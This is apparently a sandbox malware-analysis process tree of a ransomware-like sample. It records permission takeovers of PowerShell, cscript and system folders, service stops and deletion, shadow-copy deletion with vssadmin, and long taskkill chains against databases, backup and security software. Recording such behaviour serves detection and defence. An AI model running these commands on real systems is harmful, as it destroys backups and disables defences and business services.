C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo y"4⤵
-
-
C:\Windows\SysWOW64\cacls.execacls C:\Windows\system32\cscript.exe /e /d system4⤵
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo Y"4⤵
-
-
C:\Windows\SysWOW64\cacls.execacls C:\Windows\system32\cscript.exe /e /d mssql$sqlexpress4⤵
-
-
C:\Windows\SysWOW64\cacls.execacls C:\Windows\SysWOW64\cscript.exe /g Administrators:f4⤵
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo y"4⤵
-
-
C:\Windows\SysWOW64\takeown.exetakeown /f C:\Windows\SysWOW64\cscript.exe /a4⤵
- Modifies file permissions
-
-
C:\Windows\SysWOW64\cacls.execacls C:\Windows\SysWOW64\cscript.exe /e /g Users:r4⤵
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo y"4⤵
-
-
C:\Windows\SysWOW64\cacls.execacls C:\Windows\SysWOW64\cscript.exe /e /d SERVICE4⤵
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo y"4⤵
-
-
C:\Windows\SysWOW64\cacls.execacls C:\Windows\SysWOW64\cscript.exe /e /g Administrators:r4⤵
-
C:\Windows\SysWOW64\sc.exesc delete "XT800Service_Personal"5⤵
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo y"4⤵
-
-
C:\Windows\SysWOW64\cacls.execacls C:\Windows\SysWOW64\cscript.exe /e /d mssqlserver4⤵
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo y"4⤵
-
-
C:\Windows\SysWOW64\cacls.execacls C:\Windows\SysWOW64\cscript.exe /e /d system4⤵
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo y"4⤵
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo Y"4⤵
-
-
C:\Windows\SysWOW64\cacls.execacls C:\Windows\SysWOW64\cscript.exe /e /d mssql$sqlexpress4⤵
-
-
C:\Windows\SysWOW64\cacls.execacls C:\Windows\SysWOW64\cscript.exe /e /d "network service"4⤵
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo Y"4⤵
-
-
C:\Windows\SysWOW64\cacls.execacls C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe /g Administrators:f4⤵
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo y"4⤵
-
-
C:\Windows\SysWOW64\takeown.exetakeown /f C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe /a4⤵
- Modifies file permissions
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo y"4⤵
-
-
C:\Windows\SysWOW64\cacls.execacls C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe /e /g Users:r4⤵
-
-
C:\Windows\SysWOW64\cacls.execacls C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe /e /g Administrators:r4⤵
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo y"4⤵
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo y"4⤵
-
-
C:\Windows\SysWOW64\cacls.execacls C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe /e /d mssqlserver4⤵
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo y"4⤵
-
-
C:\Windows\SysWOW64\cacls.execacls C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe /e /d SERVICE4⤵
-
-
C:\Windows\SysWOW64\cacls.execacls C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe /e /d system4⤵
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo y"4⤵
-
-
C:\Windows\SysWOW64\cacls.execacls C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe /e /d "network service"4⤵
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo Y"4⤵
-
-
C:\Windows\SysWOW64\cacls.execacls C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe /e /d mssql$sqlexpress4⤵
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo Y"4⤵
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo y"4⤵
-
-
C:\Windows\SysWOW64\takeown.exetakeown /f C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe /a4⤵
- Modifies file permissions
-
-
C:\Windows\SysWOW64\cacls.execacls C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe /g Administrators:f4⤵
-
-
C:\Windows\SysWOW64\cacls.execacls C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe /e /g Administrators:r4⤵
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo y"4⤵
-
-
C:\Windows\SysWOW64\cacls.execacls C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe /e /g Users:r4⤵
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo y"4⤵
-
-
C:\Windows\SysWOW64\cacls.execacls C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe /e /d SERVICE4⤵
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo y"4⤵
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo Y"4⤵
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop VMwareHostd5⤵
-
-
-
C:\Windows\SysWOW64\cacls.execacls C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe /e /d "network service"4⤵
-
-
C:\Windows\SysWOW64\cacls.execacls C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe /e /d mssqlserver4⤵
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo y"4⤵
-
-
C:\Windows\SysWOW64\cacls.execacls C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe /e /d system4⤵
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo y"4⤵
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo Y"4⤵
-
-
C:\Windows\SysWOW64\cacls.execacls C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe /e /d mssql$sqlexpress4⤵
-
-
C:\Windows\SysWOW64\cacls.execacls C:\ProgramData /g Administrators:f4⤵
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo y"4⤵
-
-
C:\Windows\SysWOW64\takeown.exetakeown /f C:\ProgramData /a4⤵
- Modifies file permissions
-
-
C:\Windows\SysWOW64\cacls.execacls C:\ProgramData /e /g Users:r4⤵
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo y"4⤵
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo y"4⤵
-
-
C:\Windows\SysWOW64\cacls.execacls C:\ProgramData /e /d SERVICE4⤵
-
-
C:\Windows\SysWOW64\cacls.execacls C:\ProgramData /e /g Administrators:r4⤵
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo y"4⤵
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop Realtek11nSU5⤵
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo Y"4⤵
-
-
C:\Windows\SysWOW64\cacls.execacls C:\ProgramData /e /d mssqlserver4⤵
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo y"4⤵
-
-
C:\Windows\SysWOW64\cacls.execacls C:\ProgramData /e /d "network service"4⤵
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo Y"4⤵
-
-
C:\Windows\SysWOW64\cacls.execacls C:\ProgramData /e /d mssql$sqlexpress4⤵
-
-
C:\Windows\SysWOW64\cacls.execacls C:\ProgramData /e /d system4⤵
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo y"4⤵
-
-
C:\Windows\SysWOW64\takeown.exetakeown /f C:\Users\Public /a4⤵
- Modifies file permissions
-
-
C:\Windows\SysWOW64\cacls.execacls C:\Users\Public /g Administrators:f4⤵
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo y"4⤵
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo y"4⤵
-
-
C:\Windows\SysWOW64\cacls.execacls C:\Users\Public /e /g Administrators:r4⤵
-
-
C:\Windows\SysWOW64\cacls.execacls C:\Users\Public /e /g Users:r4⤵
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo y"4⤵
-
-
C:\Windows\SysWOW64\cacls.execacls C:\Users\Public /e /d SERVICE4⤵
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo y"4⤵
-
-
C:\Windows\SysWOW64\cacls.execacls C:\Users\Public /e /d "network service"4⤵
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo Y"4⤵
-
-
C:\Windows\SysWOW64\cacls.execacls C:\Users\Public /e /d mssqlserver4⤵
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo y"4⤵
-
-
C:\Windows\SysWOW64\cacls.execacls C:\Users\Public /e /d system4⤵
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo y"4⤵
-
-
C:\Windows\SysWOW64\cacls.execacls C:\Users\Public /e /d mssql$sqlexpress4⤵
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo Y"4⤵
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop "igfxCUIService2.0.0.0"5⤵
-
-
-
C:\Windows\SysWOW64\vssadmin.exevssadmin delete shadows /all /quiet4⤵
- Interacts with shadow copies
-
-
C:\Windows\SysWOW64\cmd.execmd /c "color e & @taskkill /IM pg_ctl.exe /F & @taskkill /IM rcrelay.exe /F & @taskkill /IM SogouImeBroker.exe /F & @taskkill /IM CCenter.exe /F & @taskkill /IM ScanFrm.exe /F & @taskkill /IM d_manage.exe /F & @taskkill /IM RsTray.exe /F & @taskkill /IM wampmanager.exe /F & @taskkill /IM RavTray.exe /F & @taskkill /IM mssearch.exe /F & @taskkill /IM sqlmangr.exe /F & @taskkill /IM msftesql.exe /F & @taskkill /IM SyncBaseSvr.exe /F & @taskkill /IM oracle.exe /F & @taskkill /IM TNSLSNR.exe /F & @taskkill /IM SyncBaseConsole.exe /F & @taskkill /IM aspnet_state.exe /F & @taskkill /IM AutoBackUpEx.exe /F & @taskkill /IM redis-server.exe /F & @taskkill /IM MySQLNotifier.exe /F & @taskkill /IM oravssw.exe /F & @taskkill /IM fppdis5.exe /F & @taskkill /IM His6Service.exe /F & @taskkill /IM dinotify.exe /F & @taskkill /IM JhTask.exe /F & @taskkill /IM Executer.exe /F & @taskkill /IM AllPassCBHost.exe /F & @taskkill /IM ap_nginx.exe /F & @taskkill /IM AndroidServer.exe /F & @taskkill /IM XT.exe /F & @taskkill /IM XTService.exe /F & @taskkill /IM AllPassMCService.exe /F & @taskkill /IM IMEDICTUPDATE.exe /F & @taskkill /IM FlashHelperService.exe /F & @taskkill /IM ap_redis-server.exe /F & @taskkill /IM UtilDev.WebServer.Monitor.exe /F & @taskkill /IM UWS.AppHost.Clr2.x86.exe /F & @taskkill /IM FoxitProtect.exe /F & @taskkill /IM ftnlses.exe /F & @taskkill /IM ftusbrdwks.exe /F & @taskkill /IM ftusbrdsrv.exe /F & @taskkill /IM ftnlsv.exe /F & @taskkill /IM Syslogd_Service.exe /F & @taskkill /IM UWS.HighPrivilegeUtilities.exe /F & @taskkill /IM ftusbsrv.exe /F & @taskkill /IM UWS.LowPrivilegeUtilities.exe /F & @taskkill /IM UWS.AppHost.Clr2.AnyCpu.exe /F & @taskkill /IM winguard_x64.exe /F & @taskkill /IM vmconnect.exe /F & @taskkill /IM UWS.AppHost.Clr2.x86.exe /F & @taskkill /IM firefox.exe /F & @taskkill /IM usbrdsrv.exe /F & @taskkill /IM usbserver.exe /F & @taskkill /IM Foxmail.exe /F & @taskkill /IM qemu-ga.exe /F & @taskkill /IM wwbizsrv.exe /F & @taskkill /IM ZTEFileTranS.exe /F & @taskkill /IM ZTEUsbIpc.exe /F & @taskkill /IM ZTEUsbIpcGuard.exe /F & @taskkill /IM AlibabaProtect.exe /F & @taskkill /IM kbasesrv.exe /F & @taskkill /IM ZTEVdservice.exe /F & @taskkill /IM MMRHookService.exe /F & @taskkill /IM extjob.exe /F & @taskkill /IM IpOverUsbSvc.exe /F & @taskkill /IM VMwareTray.exe /F & @taskkill /IM devenv.exe /F & @taskkill /IM PerfWatson2.exe /F & @taskkill /IM ServiceHub.Host.Node.x86.exe /F & @taskkill /IM ServiceHub.IdentityHost.exe /F & @taskkill /IM ServiceHub.VSDetouredHost.exe /F & @taskkill /IM ServiceHub.SettingsHost.exe /F & @taskkill /IM ServiceHub.Host.CLR.x86.exe /F & @taskkill /IM ServiceHub.RoslynCodeAnalysisService32.exe /F & @taskkill /IM ServiceHub.DataWarehouseHost.exe /F & @taskkill /IM Microsoft.VisualStudio.Web.Host.exe /F & @taskkill /IM SQLEXPRWT.exe /F & @taskkill /IM setup.exe /F & @taskkill /IM remote.exe /F & @taskkill /IM setup100.exe /F & @taskkill /IM landingpage.exe /F & @taskkill /IM WINWORD.exe /F & @taskkill /IM KuaiYun.exe /F & @taskkill /IM HwsHostPanel.exe /F & @taskkill /IM NovelSpider.exe /F & @taskkill /IM Service_KMS.exe /F & @taskkill /IM WebServer.exe /F & @taskkill /IM ChsIME.exe /F & @taskkill /IM btPanel.exe /F & @taskkill /IM Protect_2345Explorer.exe /F & @taskkill /IM Pic_2345Svc.exe /F & @taskkill /IM vmware-converter-a.exe /F & @taskkill /IM vmware-converter.exe /F & @taskkill /IM vmware.exe /F & @taskkill /IM vmware-unity-helper.exe /F & @taskkill /IM vmware-vmx.exe /F & @taskkill /IM vmware-vmx.exe /F & @taskkill /IM usysdiag.exe /F & @taskkill /IM PopBlock.exe /F & @taskkill /IM gsinterface.exe /F & @taskkill /IM Gemstar.Group.CRS.Client.exe /F & @taskkill /IM TenpayServer.exe /F & @taskkill /IM RemoteExecService.exe /F & @taskkill /IM VS_TrueCorsManager.exe /F & @taskkill /IM ntpsvr-2019-01-22-wgs84.exe /F & @taskkill /IM rtkjob-ion.exe /F & @taskkill /IM ntpsvr-2019-01-22-no-usrcheck.exe /F & @taskkill /IM NtripCaster-2019-01-08.exe /F & @taskkill /IM BACSTray.exe /F & @taskkill /IM protect.exe /F & @taskkill /IM hfs.exe /F & @taskkill /IM jzmis.exe /F & @taskkill /IM NewFileTime_x64.exe /F & @taskkill /IM 2345MiniPage.exe /F & @taskkill /IM JMJ_server.exe /F & @taskkill /IM cacls.exe /F & @taskkill /IM gpsdaemon.exe /F & @taskkill /IM gpsusersvr.exe /F & @taskkill /IM gpsdownsvr.exe /F & @taskkill /IM gpsstoragesvr.exe /F & @taskkill /IM gpsdataprocsvr.exe /F & @taskkill /IM gpsftpd.exe /F & @taskkill /IM gpsmysqld.exe /F & @taskkill /IM gpstomcat6.exe /F & @taskkill /IM gpsloginsvr.exe /F & @taskkill /IM gpsmediasvr.exe /F & @taskkill /IM gpsgatewaysvr.exe /F & @taskkill /IM gpssvrctrl.exe /F & @taskkill /IM zabbix_agentd.exe /F"4⤵
-
C:\Windows\SysWOW64\taskkill.exetaskkill /IM pg_ctl.exe /F5⤵
-
-
C:\Windows\SysWOW64\taskkill.exetaskkill /IM rcrelay.exe /F5⤵
-
-
C:\Windows\SysWOW64\taskkill.exetaskkill /IM SogouImeBroker.exe /F5⤵
- Kills process with taskkill
-
-
C:\Windows\SysWOW64\taskkill.exetaskkill /IM CCenter.exe /F5⤵
-
-
C:\Windows\SysWOW64\taskkill.exetaskkill /IM ScanFrm.exe /F5⤵
- Suspicious use of AdjustPrivilegeToken
-
-
C:\Windows\SysWOW64\taskkill.exetaskkill /IM d_manage.exe /F5⤵
-
-
C:\Windows\SysWOW64\taskkill.exetaskkill /IM RsTray.exe /F5⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
-
-
C:\Windows\SysWOW64\taskkill.exetaskkill /IM wampmanager.exe /F5⤵
-
-
C:\Windows\SysWOW64\taskkill.exetaskkill /IM RavTray.exe /F5⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
-
-
C:\Windows\SysWOW64\taskkill.exetaskkill /IM mssearch.exe /F5⤵
-
-
C:\Windows\SysWOW64\taskkill.exetaskkill /IM sqlmangr.exe /F5⤵
-
-
C:\Windows\SysWOW64\taskkill.exetaskkill /IM msftesql.exe /F5⤵
- Kills process with taskkill
-
-
C:\Windows\SysWOW64\taskkill.exetaskkill /IM SyncBaseSvr.exe /F5⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
-
-
C:\Windows\SysWOW64\taskkill.exetaskkill /IM oracle.exe /F5⤵
-
-
C:\Windows\SysWOW64\taskkill.exetaskkill /IM TNSLSNR.exe /F5⤵
-
-
C:\Windows\SysWOW64\taskkill.exetaskkill /IM SyncBaseConsole.exe /F5⤵
-
-
C:\Windows\SysWOW64\taskkill.exetaskkill /IM aspnet_state.exe /F5⤵
-
-
C:\Windows\SysWOW64\taskkill.exetaskkill /IM AutoBackUpEx.exe /F5⤵
-
-
C:\Windows\SysWOW64\taskkill.exetaskkill /IM redis-server.exe /F5⤵
- Kills process with taskkill
-
-
C:\Windows\SysWOW64\taskkill.exetaskkill /IM MySQLNotifier.exe /F5⤵
-
-
C:\Windows\SysWOW64\taskkill.exetaskkill /IM oravssw.exe /F5⤵
-
-
C:\Windows\SysWOW64\taskkill.exetaskkill /IM fppdis5.exe /F5⤵
-
-
C:\Windows\SysWOW64\taskkill.exetaskkill /IM His6Service.exe /F5⤵
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop "Bonjour Service"6⤵
-
-
-
C:\Windows\SysWOW64\taskkill.exetaskkill /IM dinotify.exe /F5⤵
- Kills process with taskkill
-
-
C:\Windows\SysWOW64\taskkill.exetaskkill /IM JhTask.exe /F5⤵
-
-
C:\Windows\SysWOW64\taskkill.exetaskkill /IM Executer.exe /F5⤵
-
-
C:\Windows\SysWOW64\taskkill.exetaskkill /IM AllPassCBHost.exe /F5⤵
-
-
C:\Windows\SysWOW64\taskkill.exetaskkill /IM ap_nginx.exe /F5⤵
-
-
C:\Windows\SysWOW64\taskkill.exetaskkill /IM AndroidServer.exe /F5⤵
- Kills process with taskkill
-
-
C:\Windows\SysWOW64\taskkill.exetaskkill /IM XT.exe /F5⤵
-
-
C:\Windows\SysWOW64\taskkill.exetaskkill /IM XTService.exe /F5⤵
-
-
C:\Windows\SysWOW64\taskkill.exetaskkill /IM AllPassMCService.exe /F5⤵
-
-
C:\Windows\SysWOW64\taskkill.exetaskkill /IM IMEDICTUPDATE.exe /F5⤵
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c "color e & @taskkill /IM BackupExec.exe /F & @taskkill /IM Att.exe /F & @taskkill /IM mdm.exe /F & @taskkill /IM BackupExecManagementService.exe /F & @taskkill /IM bengine.exe /F & @taskkill /IM benetns.exe /F & @taskkill /IM beserver.exe /F & @taskkill /IM pvlsvr.exe /F & @taskkill /IM bedbg.exe /F & @taskkill /IM beremote.exe /F & @taskkill /IM beremote.exe /F & @taskkill /IM beremote.exe /F & @taskkill /IM beremote.exe /F & @taskkill /IM RemoteAssistProcess.exe /F & @taskkill /IM BarMoniService.exe /F & @taskkill /IM GoodGameSrv.exe /F & @taskkill /IM BarCMService.exe /F & @taskkill /IM TsService.exe /F & @taskkill /IM GoodGame.exe /F & @taskkill /IM BarServerView.exe /F & @taskkill /IM IcafeServicesTray.exe /F & @taskkill /IM BsAgent_0.exe /F & @taskkill /IM ControlServer.exe /F & @taskkill /IM DisklessServer.exe /F & @taskkill /IM DumpServer.exe /F & @taskkill /IM NetDiskServer.exe /F & @taskkill /IM PersonUDisk.exe /F & @taskkill /IM service_agent.exe /F & @taskkill /IM SoftMemory.exe /F & @taskkill /IM BarServer.exe /F & @taskkill /IM RtkNGUI64.exe /F & @taskkill /IM Serv-U-Tray.exe /F & @taskkill /IM QQPCSoftTrayTips.exe /F & @taskkill /IM SohuNews.exe /F & @taskkill /IM Serv-U.exe /F & @taskkill /IM QQPCRTP.exe /F & @taskkill /IM EasyFZS.exe /F & @taskkill /IM HaoYiShi.exe /F & @taskkill /IM HysMySQL.exe /F & @taskkill /IM wtautoreg.exe /F & @taskkill /IM ispiritPro.exe /F & @taskkill /IM CAService.exe /F & @taskkill /IM XAssistant.exe /F & @taskkill /IM TrustCA.exe /F & @taskkill /IM GEUU20003.exe /F & @taskkill /IM CertMgr.exe /F & @taskkill /IM eSafe_monitor.exe /F & @taskkill /IM MainExecute.exe /F & @taskkill /IM FastInvoice.exe /F & @taskkill /IM SoftMgrLite.exe /F & @taskkill /IM sesvc.exe /F & @taskkill /IM ScanFileServer.exe /F & @taskkill /IM Nuoadehgcgcd.exe /F & @taskkill /IM OpenFastAssist.exe /F & @taskkill /IM FastInvoiceAssist.exe /F & @taskkill /IM Nuoadfaggcje.exe /F & @taskkill /IM OfficeUpdate.exe /F & @taskkill /IM atkexComSvc.exe /F & @taskkill /IM FileTransferAgent.exe /F & @taskkill /IM MasterReplicatorAgent.exe /F & @taskkill /IM CrmAsyncService.exe /F & @taskkill /IM CrmAsyncService.exe /F & @taskkill /IM CrmUnzipService.exe /F & @taskkill /IM NscAuthService.exe /F & @taskkill /IM ReplicaReplicatorAgent.exe /F & @taskkill /IM ASMCUSvc.exe /F & @taskkill /IM OcsAppServerHost.exe /F & @taskkill /IM RtcCdr.exe /F & @taskkill /IM IMMCUSvc.exe /F & @taskkill /IM DataMCUSvc.exe /F & @taskkill /IM MeetingMCUSvc.exe /F & @taskkill /IM QmsSvc.exe /F & @taskkill /IM RTCSrv.exe /F & @taskkill /IM pnopagw.exe /F & @taskkill /IM NscAuth.exe /F & @taskkill /IM Microsoft.ActiveDirectory.WebServices.exe /F & @taskkill /IM DistributedCacheService.exe /F & @taskkill /IM c2wtshost.exe /F & @taskkill /IM Microsoft.Office.Project.Server.Calculation.exe /F & @taskkill /IM schedengine.exe /F & @taskkill /IM Microsoft.Office.Project.Server.Eventing.exe /F & @taskkill /IM Microsoft.Office.Project.Server.Queuing.exe /F & @taskkill /IM WSSADMIN.EXE /F & @taskkill /IM hostcontrollerservice.exe /F & @taskkill /IM noderunner.exe /F & @taskkill /IM OWSTIMER.EXE /F & @taskkill /IM wsstracing.exe /F & @taskkill /IM mssearch.exe /F & @taskkill /IM MySQLInstallerConsole.exe /F & @taskkill /IM EXCEL.EXE /F & @taskkill /IM consent.exe /F & @taskkill /IM RtkAudioService64.exe /F & @taskkill /IM RAVBg64.exe /F & @taskkill /IM FNPLicensingService64.exe /F & @taskkill /IM VisualSVNServer.exe /F & @taskkill /IM MotionBoard57.exe /F & @taskkill /IM MotionBoardRCService57.exe /F & @taskkill /IM LPManService.exe /F & @taskkill /IM RaRegistry.exe /F & @taskkill /IM RaAutoInstSrv.exe /F & @taskkill /IM RtHDVCpl.exe /F & @taskkill /IM DefenderDaemon.exe /F & @taskkill /IM BestSyncApp.exe /F & @taskkill /IM ApUI.exe /F & @taskkill /IM AutoUpdate.exe /F & @taskkill /IM LPManNotifier.exe /F & @taskkill /IM FieldAnalyst.exe /F & @taskkill /IM TimingGenerate.exe /F & @taskkill /IM Detector.exe /F & @taskkill /IM Estimator.exe /F & @taskkill /IM FA_Logwriter.exe /F & @taskkill /IM TrackingSrv.exe /F & @taskkill /IM cbInterface.exe /F & @taskkill /IM EnterprisePortal.exe /F & @taskkill /IM ccbService.exe /F & @taskkill /IM monitor.exe /F & @taskkill /IM U8DispatchService.exe /F & @taskkill /IM dbsrv16.exe /F & @taskkill /IM sqlservr.exe /F & @taskkill /IM KICManager.exe /F & @taskkill /IM KICMain.exe /F & @taskkill /IM ServerManagerLauncher.exe /F & @taskkill /IM TbossGate.exe /F & @taskkill /IM iusb3mon.exe /F & @taskkill /IM MgrEnvSvc.exe /F & @taskkill /IM Mysoft.Config.WindowsService.exe /F & @taskkill /IM Mysoft.UpgradeService.UpdateService.exe /F & @taskkill /IM hasplms.exe /F & @taskkill /IM Mysoft.Setup.InstallService.exe /F & @taskkill /IM Mysoft.UpgradeService.Dispatcher.exe /F & @taskkill /IM Mysoft.DataCenterService.WindowsHost.exe /F & @taskkill /IM Mysoft.DataCenterService.DataCleaning.exe /F & @taskkill /IM Mysoft.DataCenterService.DataTracking.exe /F & @taskkill /IM Mysoft.SchedulingService.WindowsHost.exe /F & @taskkill /IM ServiceMonitor.exe /F & @taskkill /IM Mysoft.SchedulingService.ExecuteEngine.exe /F & @taskkill /IM AgentX.exe /F & @taskkill /IM host.exe /F & @taskkill /IM AutoUpdate.exe /F & @taskkill /IM vsjitdebugger.exe /F"4⤵
-
C:\Windows\SysWOW64\taskkill.exetaskkill /IM BackupExec.exe /F5⤵
-
-
C:\Windows\SysWOW64\taskkill.exetaskkill /IM Att.exe /F5⤵
- Suspicious use of AdjustPrivilegeToken
-
-
C:\Windows\SysWOW64\taskkill.exetaskkill /IM mdm.exe /F5⤵
-
-
C:\Windows\SysWOW64\taskkill.exetaskkill /IM BackupExecManagementService.exe /F5⤵
-
-
C:\Windows\SysWOW64\taskkill.exetaskkill /IM bengine.exe /F5⤵
- Suspicious use of AdjustPrivilegeToken
-
-
C:\Windows\SysWOW64\taskkill.exetaskkill /IM benetns.exe /F5⤵
- Kills process with taskkill
-
-
C:\Windows\SysWOW64\taskkill.exetaskkill /IM beserver.exe /F5⤵
- Kills process with taskkill
-
-
C:\Windows\SysWOW64\taskkill.exetaskkill /IM pvlsvr.exe /F5⤵
-
-
C:\Windows\SysWOW64\taskkill.exetaskkill /IM bedbg.exe /F5⤵
-
-
C:\Windows\SysWOW64\taskkill.exetaskkill /IM beremote.exe /F5⤵
-
-
C:\Windows\SysWOW64\taskkill.exetaskkill /IM beremote.exe /F5⤵
-
-
C:\Windows\SysWOW64\taskkill.exetaskkill /IM beremote.exe /F5⤵
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop d_safe6⤵
-
-
-
C:\Windows\SysWOW64\taskkill.exetaskkill /IM beremote.exe /F5⤵
- Suspicious use of AdjustPrivilegeToken
-
-
C:\Windows\SysWOW64\taskkill.exetaskkill /IM RemoteAssistProcess.exe /F5⤵
-
-
C:\Windows\SysWOW64\taskkill.exetaskkill /IM BarMoniService.exe /F5⤵
- Kills process with taskkill
-
-
C:\Windows\SysWOW64\taskkill.exetaskkill /IM GoodGameSrv.exe /F5⤵
-
-
C:\Windows\SysWOW64\taskkill.exetaskkill /IM BarCMService.exe /F5⤵
- Suspicious use of AdjustPrivilegeToken
-
-
C:\Windows\SysWOW64\taskkill.exetaskkill /IM TsService.exe /F5⤵
-
-
C:\Windows\SysWOW64\taskkill.exetaskkill /IM GoodGame.exe /F5⤵
-
-
C:\Windows\SysWOW64\taskkill.exetaskkill /IM BarServerView.exe /F5⤵
-
-
C:\Windows\SysWOW64\taskkill.exetaskkill /IM IcafeServicesTray.exe /F5⤵
- Kills process with taskkill
-
-
C:\Windows\SysWOW64\taskkill.exetaskkill /IM BsAgent_0.exe /F5⤵
-
-
C:\Windows\SysWOW64\taskkill.exetaskkill /IM ControlServer.exe /F5⤵
-
-
C:\Windows\SysWOW64\taskkill.exetaskkill /IM DisklessServer.exe /F5⤵
-
-
C:\Windows\SysWOW64\taskkill.exetaskkill /IM DumpServer.exe /F5⤵
-
-
C:\Windows\SysWOW64\taskkill.exetaskkill /IM NetDiskServer.exe /F5⤵
-
-
C:\Windows\SysWOW64\taskkill.exetaskkill /IM PersonUDisk.exe /F5⤵
-
-
C:\Windows\SysWOW64\taskkill.exetaskkill /IM service_agent.exe /F5⤵
-
-
C:\Windows\SysWOW64\taskkill.exetaskkill /IM SoftMemory.exe /F5⤵
-
-
C:\Windows\SysWOW64\taskkill.exetaskkill /IM BarServer.exe /F5⤵
-
-
C:\Windows\SysWOW64\taskkill.exetaskkill /IM RtkNGUI64.exe /F5⤵
-
-
C:\Windows\SysWOW64\taskkill.exetaskkill /IM Serv-U-Tray.exe /F5⤵
-
-
-
